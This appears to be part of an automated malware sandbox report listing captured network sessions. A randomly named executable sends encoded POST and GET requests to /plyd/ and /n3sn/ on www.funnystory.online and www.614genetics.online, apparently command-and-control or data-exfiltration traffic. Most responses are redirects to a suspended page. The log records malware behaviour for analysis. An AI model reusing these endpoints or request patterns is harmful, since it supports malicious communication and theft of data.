                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 51 78 76 35 57 71 61 74 39 70 47 61 53 66 71 51 55 4e 35 61 6e 37 2b 76 61 77 4a 31 39 2b 6f 41 42 7a 73 53 7a 32 73 6f 66 6b 53 62 63 46 4c 63 57 39 53 4b 41 54 33 51 62 68 39 77 64 58 47 7a 2b 2f 46 4c 6a 46 42 63 4a 32 71 53 6b 68 66 65 79 2f 75 31 4f 74 46 71 6e 63 4f 2f 36 6e 4e 57 67 63 64 31 46 67 36 32 35 4f 5a 69 47 62 47 68 57 6f 6d 54 49 52 50 39 4a 4d 59 48 72 68 61 52 68 76 79 74 52 33 34 30 30 39 78 6d 55 79 47 67 39 4b 61 2f 56 48 58 46 31 67 61 52 73 42 57 71 74 7a 38 79 6c 68 31 4e 73 33 79 36 4c 2f 78 75 7a 4a 62 58 7a 4b 70 2b 69 35 2b 63 30 64 72 37 4a 2f 46 6f 61 34 6f 30 47 34 68 6d
                                                                                                                            Data Ascii: u6nP_F48=Qxv5Wqat9pGaSfqQUN5an7+vawJ19+oABzsSz2sofkSbcFLcW9SKAT3Qbh9wdXGz+/FLjFBcJ2qSkhfey/u1OtFqncO/6nNWgcd1Fg625OZiGbGhWomTIRP9JMYHrhaRhvytR34009xmUyGg9Ka/VHXF1gaRsBWqtz8ylh1Ns3y6L/xuzJbXzKp+i5+c0dr7J/Foa4o0G4hm
                                                                                                                            Dec 3, 2024 14:40:09.457550049 CET464INHTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:09 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi
                                                                                                                            Content-Length: 238
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 75 6e 6e 79 73 74 6f 72 79 2e 6f 6e 6c 69 6e 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.650036172.104.82.74805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:10.720089912 CET842OUTPOST /plyd/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.funnystory.online
                                                                                                                            Referer: http://www.funnystory.online/plyd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 51 78 76 35 57 71 61 74 39 70 47 61 52 2f 36 51 48 36 6c 61 69 62 2b 75 65 41 4a 31 7a 65 6f 45 42 7a 67 53 7a 33 70 31 65 53 43 62 63 6c 37 63 58 34 2b 4b 44 54 33 51 50 78 39 31 54 33 47 34 2b 2f 4a 44 6a 48 56 63 4a 33 4f 53 6b 68 76 65 79 49 79 71 4f 39 46 6b 79 4d 4f 39 2b 6e 4e 57 67 63 64 31 46 67 65 51 35 50 78 69 47 6f 65 68 4d 4b 65 51 55 42 50 2b 42 73 59 48 36 78 61 4e 68 76 79 44 52 79 59 53 30 2f 35 6d 55 79 57 67 39 66 32 34 43 58 58 4c 72 51 62 31 74 69 6a 5a 6f 78 4e 75 71 52 31 71 76 77 71 46 4b 4a 73 30 76 36 62 30 68 61 4a 38 69 37 6d 75 30 39 72 52 4c 2f 39 6f 49 76 6b 54 4a 4d 45 46 4f 6a 52 31 7a 61 35 70 70 78 37 36 65 42 41 55 51 6c 43 38 6b 67 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=Qxv5Wqat9pGaR/6QH6laib+ueAJ1zeoEBzgSz3p1eSCbcl7cX4+KDT3QPx91T3G4+/JDjHVcJ3OSkhveyIyqO9FkyMO9+nNWgcd1FgeQ5PxiGoehMKeQUBP+BsYH6xaNhvyDRyYS0/5mUyWg9f24CXXLrQb1tijZoxNuqR1qvwqFKJs0v6b0haJ8i7mu09rRL/9oIvkTJMEFOjR1za5ppx76eBAUQlC8kg==
                                                                                                                            Dec 3, 2024 14:40:12.133110046 CET464INHTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:11 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi
                                                                                                                            Content-Length: 238
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 75 6e 6e 79 73 74 6f 72 79 2e 6f 6e 6c 69 6e 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.650037172.104.82.74805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:13.438276052 CET1855OUTPOST /plyd/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.funnystory.online
                                                                                                                            Referer: http://www.funnystory.online/plyd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 51 78 76 35 57 71 61 74 39 70 47 61 52 2f 36 51 48 36 6c 61 69 62 2b 75 65 41 4a 31 7a 65 6f 45 42 7a 67 53 7a 33 70 31 65 53 4b 62 63 57 7a 63 56 62 47 4b 43 54 33 51 54 42 39 30 54 33 47 35 2b 2f 52 48 6a 48 59 2b 4a 30 6d 53 6b 41 50 65 30 35 79 71 64 64 46 6b 77 4d 4f 2b 36 6e 4e 50 67 59 35 70 46 67 4f 51 35 50 78 69 47 76 6d 68 43 49 6d 51 57 42 50 39 4a 4d 5a 54 72 68 61 70 68 76 62 2b 52 79 73 64 30 4f 5a 6d 55 54 6d 67 75 5a 43 34 64 6e 58 4a 71 51 62 74 74 69 2f 47 6f 31 6c 69 71 53 70 55 76 33 61 46 49 66 46 7a 71 35 2f 4f 67 62 51 61 6a 37 4b 4c 73 62 62 66 4d 76 78 48 4c 39 6f 6c 42 38 51 53 50 30 55 6a 6e 59 4d 62 6a 7a 7a 33 66 6e 55 46 5a 31 4c 4c 6d 4f 74 6d 50 57 67 6c 75 42 71 30 4a 49 6b 48 41 33 56 36 56 6f 33 77 6f 59 62 4b 58 72 54 44 7a 58 71 2f 6a 79 52 2b 34 31 7a 49 73 43 61 71 76 2b 6d 30 43 54 78 63 6d 74 5a 37 6a 57 34 33 50 53 65 47 74 69 66 79 58 64 63 51 38 7a 65 6e 74 67 53 6e 31 6b 73 35 6e 78 62 55 64 34 5a 66 6b 67 74 58 45 64 56 55 36 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=Qxv5Wqat9pGaR/6QH6laib+ueAJ1zeoEBzgSz3p1eSKbcWzcVbGKCT3QTB90T3G5+/RHjHY+J0mSkAPe05yqddFkwMO+6nNPgY5pFgOQ5PxiGvmhCImQWBP9JMZTrhaphvb+Rysd0OZmUTmguZC4dnXJqQbtti/Go1liqSpUv3aFIfFzq5/OgbQaj7KLsbbfMvxHL9olB8QSP0UjnYMbjzz3fnUFZ1LLmOtmPWgluBq0JIkHA3V6Vo3woYbKXrTDzXq/jyR+41zIsCaqv+m0CTxcmtZ7jW43PSeGtifyXdcQ8zentgSn1ks5nxbUd4ZfkgtXEdVU6SaYpC/T/FR5+3PZWh0wS4ta6uOkYoK+E4Kr71ZJHK9B8c4c5TjQv+aUkLnqDkKtqvp4gv1aPJ6VI5DMgFDs1diudFQZJOyDPCf95jVhQj/z/7b/Yu5BiOYvkyUt3o+CWldZr/Sy6ShOZeQ9wL136q4JCa7lrGQ6Ad8EcSa0WxfJ5Dk7re8hOAQiX/lAjpCTeDrocXMvAiztCiS6/IAEPByOJ2XHp/wccw7pknJWYs93k0rTYRzLFETta1aEJ37q64rS4hxgTn6JpemDbvuOv3t2Emsq8nVz4Ad/T0zZUpX+GoQN4Q26e9zRIvJudlwdAaZ/Vd28t1xHYkhxLCVI0ZEyygJE1oItujJDuiJ30o6cqP08Rfxvqnf2xuA/d3SRPNJdeKq0KonKRc9R2LXCRzLyTh1bzrujkDAn54uJhRj3yz2H/xjyGX4t9dr5y0g6GhXHOEspdbeiRn4BLJdxoJWUajWcOYifHIN0OdA4zqmqfjU7BWoBqLPf+WivZ7r2fgEwlTv8fk83w3j/IrV5TICTsyF0GuUQljfp4EFG2KYVZ4cqwqO20gEAggYwDj2p7Las6KhyeN0yALrhkstCvJPgizDH/RD32gJjZv72uCm+2t2S3MItd/TTUe9HkqEUJH57gthMGTg/ov3M5gBlwUGBFeFTZXid3OO [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:40:14.963255882 CET464INHTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:14 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi
                                                                                                                            Content-Length: 238
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 75 6e 6e 79 73 74 6f 72 79 2e 6f 6e 6c 69 6e 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.2.650038172.104.82.74805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:16.107203960 CET557OUTGET /plyd/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:40:17.522635937 CET802INHTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:17 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE=
                                                                                                                            Content-Length: 409
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 75 6e 6e 79 73 74 6f 72 79 2e 6f 6e 6c 69 6e 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 46 38 53 30 47 3d 75 6c 38 30 72 50 68 78 46 6c 52 38 6c 48 26 61 6d 70 3b 75 36 6e 50 5f 46 34 38 3d 64 7a 48 5a 56 64 65 41 36 72 36 61 42 59 2b 57 4a 4b 6c 44 31 4a 76 4e 63 53 38 41 74 2f 68 54 42 69 59 35 30 48 41 50 5a 56 32 6f 66 6d 2f 47 5a 71 58 52 66 51 50 4b 59 52 56 4c 52 6b 54 52 33 73 56 48 6a 6c 35 33 42 6d 69 6b 74 69 66 68 33 36 79 41 45 73 56 6a 31 6f 72 6a 77 33 6c 33 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&amp;u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE=">here</a>.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.2.650039208.91.197.27805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:23.324469090 CET821OUTPOST /n3sn/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.614genetics.online
                                                                                                                            Referer: http://www.614genetics.online/n3sn/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 63 64 69 33 59 54 5a 69 77 6e 72 49 51 32 4e 34 64 62 6f 48 43 35 65 6a 41 70 74 4b 7a 38 6b 70 75 75 38 77 38 2b 6a 63 4a 67 75 79 47 76 5a 73 59 51 66 50 4e 70 37 2b 67 76 4f 58 78 36 56 31 56 35 39 6e 57 43 63 2b 65 72 31 57 33 56 43 6f 77 41 56 41 37 41 59 62 39 62 42 38 58 47 55 4b 77 4e 42 76 42 72 5a 58 52 48 6d 64 32 5a 4e 2f 64 30 71 6a 72 59 54 61 44 76 48 39 54 64 57 59 39 45 7a 53 47 7a 73 4b 54 44 38 76 39 56 31 6f 47 49 5a 36 61 34 70 43 65 48 78 6d 62 65 49 70 62 6f 6f 62 35 65 53 71 45 36 66 4b 47 68 33 72 63 49 71 6f 79 66 52 32 33 36 71 58 6f 59 51 66 4b 53 4e 63 49 70 78 4e 61 4e 78 33
                                                                                                                            Data Ascii: u6nP_F48=cdi3YTZiwnrIQ2N4dboHC5ejAptKz8kpuu8w8+jcJguyGvZsYQfPNp7+gvOXx6V1V59nWCc+er1W3VCowAVA7AYb9bB8XGUKwNBvBrZXRHmd2ZN/d0qjrYTaDvH9TdWY9EzSGzsKTD8v9V1oGIZ6a4pCeHxmbeIpboob5eSqE6fKGh3rcIqoyfR236qXoYQfKSNcIpxNaNx3


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.650040208.91.197.27805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:25.984782934 CET845OUTPOST /n3sn/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.614genetics.online
                                                                                                                            Referer: http://www.614genetics.online/n3sn/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 63 64 69 33 59 54 5a 69 77 6e 72 49 51 57 39 34 4f 6f 51 48 56 70 65 69 4d 4a 74 4b 36 63 6b 74 75 75 77 77 38 38 4f 52 4a 53 4b 79 47 4b 64 73 5a 55 4c 50 42 4a 37 2b 72 50 4f 53 38 61 55 33 56 35 67 61 57 41 59 2b 65 76 64 57 33 56 53 6f 77 53 39 44 30 77 59 5a 78 37 42 36 4b 32 55 4b 77 4e 42 76 42 72 63 36 52 48 2b 64 31 70 64 2f 66 56 71 67 6f 59 54 5a 55 66 48 39 5a 4e 57 55 39 45 79 48 47 32 31 6e 54 48 4d 76 39 58 39 6f 47 5a 5a 31 54 34 70 45 44 58 77 6a 62 38 64 31 52 70 5a 70 32 74 57 32 66 71 62 58 4f 33 71 78 41 37 71 4c 67 50 78 30 33 34 79 6c 6f 34 51 31 49 53 31 63 61 2b 39 71 56 35 55 55 2b 6a 44 6c 56 71 68 6a 65 5a 38 46 66 30 46 6b 33 38 52 38 51 51 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=cdi3YTZiwnrIQW94OoQHVpeiMJtK6cktuuww88ORJSKyGKdsZULPBJ7+rPOS8aU3V5gaWAY+evdW3VSowS9D0wYZx7B6K2UKwNBvBrc6RH+d1pd/fVqgoYTZUfH9ZNWU9EyHG21nTHMv9X9oGZZ1T4pEDXwjb8d1RpZp2tW2fqbXO3qxA7qLgPx034ylo4Q1IS1ca+9qV5UU+jDlVqhjeZ8Ff0Fk38R8QQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.2.650041208.91.197.27805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:28.655308962 CET1858OUTPOST /n3sn/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.614genetics.online
                                                                                                                            Referer: http://www.614genetics.online/n3sn/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 63 64 69 33 59 54 5a 69 77 6e 72 49 51 57 39 34 4f 6f 51 48 56 70 65 69 4d 4a 74 4b 36 63 6b 74 75 75 77 77 38 38 4f 52 4a 53 43 79 47 59 56 73 59 7a 33 50 50 70 37 2b 33 66 4f 54 38 61 55 32 56 35 34 65 57 41 56 46 65 74 6c 57 78 47 71 6f 6e 54 39 44 76 41 59 5a 35 62 42 37 58 47 55 66 77 4e 52 72 42 72 4d 36 52 48 2b 64 31 72 56 2f 52 55 71 67 75 59 54 61 44 76 48 35 54 64 58 42 39 45 72 77 47 32 42 52 54 30 45 76 39 33 74 6f 46 72 78 31 63 34 70 38 43 58 77 46 62 38 42 63 52 70 45 59 32 75 4b 51 66 74 54 58 65 67 50 34 53 4a 32 49 2f 38 70 4c 6d 65 6d 34 74 50 73 68 42 52 78 69 63 64 74 4d 53 37 51 4d 34 30 6a 6d 64 49 55 4d 4a 59 49 52 5a 79 6b 4d 32 59 38 6d 43 6e 2b 52 45 43 39 39 36 4a 47 74 4b 52 7a 4a 71 34 4e 56 38 32 70 79 5a 37 72 4c 56 50 2b 50 69 75 6a 63 4f 67 6d 6c 41 4b 66 33 4c 57 4c 53 73 70 31 38 30 68 38 61 72 36 78 6a 64 76 4e 30 4f 33 62 64 57 74 5a 61 44 58 47 68 35 55 45 42 6f 4e 30 77 63 69 6a 75 47 70 37 62 44 7a 4c 41 37 35 6b 71 44 4c 44 57 38 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=cdi3YTZiwnrIQW94OoQHVpeiMJtK6cktuuww88ORJSCyGYVsYz3PPp7+3fOT8aU2V54eWAVFetlWxGqonT9DvAYZ5bB7XGUfwNRrBrM6RH+d1rV/RUqguYTaDvH5TdXB9ErwG2BRT0Ev93toFrx1c4p8CXwFb8BcRpEY2uKQftTXegP4SJ2I/8pLmem4tPshBRxicdtMS7QM40jmdIUMJYIRZykM2Y8mCn+REC996JGtKRzJq4NV82pyZ7rLVP+PiujcOgmlAKf3LWLSsp180h8ar6xjdvN0O3bdWtZaDXGh5UEBoN0wcijuGp7bDzLA75kqDLDW8ygAxHCWxmShlHyt9+N6PqXVy7n2TEjBS6Wv4CaPMuJaOZ+VDYqLJwvaJM9VxX6JMkpAFCfwWuXgL7kmFc45HSBu5Kvery4UpsqVsKW7Hb1DZ159SseF3z9UIEbto7jf+uGeOoaIrKPBNz5wtCm5DfsRNzYjrPKzj6lmcwBtcC4X7iGwglMEBO0DstEpTJypR+osuFuJrYemm3gZ64/h18FUSsbupJKsB01CCpgqMQ8epoYMLvvXGPW28NAqUX8ylEC8Z2MynDyeHEBbRwLVYbAC8cmrE6a4sIoOcj6Zfki7OVS3VmdC/q4GLQTsdlm3t/mpn8+A4BCtw2P6HPfgLRM5+lOM/Jmd0QbCxvQl9byC/fI1HxsonYCj24uUfHIUSvCqF+xzwdfO2TlH5L60BERIxwB4WiIR+hMB62VbW/10V6I2E+rZisxL+WRouY2c6rbDgsNpetYaMYj7a8YwfQq0RdRhV9FfBPyIPL/2UpmnP2cDGrCLNv+8p16kryNTBf+AIcrvfoqXPOdYmRbZ11xMQ63SbrXEFqXZYkA7n+EeHPGmM2EJzd5ehUTmiDvGKu9Qs+AEQT8FgLNaLO3B/8pr6yjjKIQICanV+MDTe3Hz/cDCAkanJiPKYaDdhqmN7nvSrXKphi2E39dAXYTdXr3ojDKYKvFGzs4 [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.2.650042208.91.197.27805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:31.318845987 CET558OUTGET /n3sn/?u6nP_F48=RfKXbkttwVfKfWhPTrA3UJfHAa0lqotu1/Ih4u/jCz+IVopDYjbPUryKgNOP1Jh4fKEyHC4SaeJpkkGXoxNgwDh8y8hzLkYWybtZWLt0K3r82a9qd0enmdThBea8SuX4gW/lNzc=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Connection: close
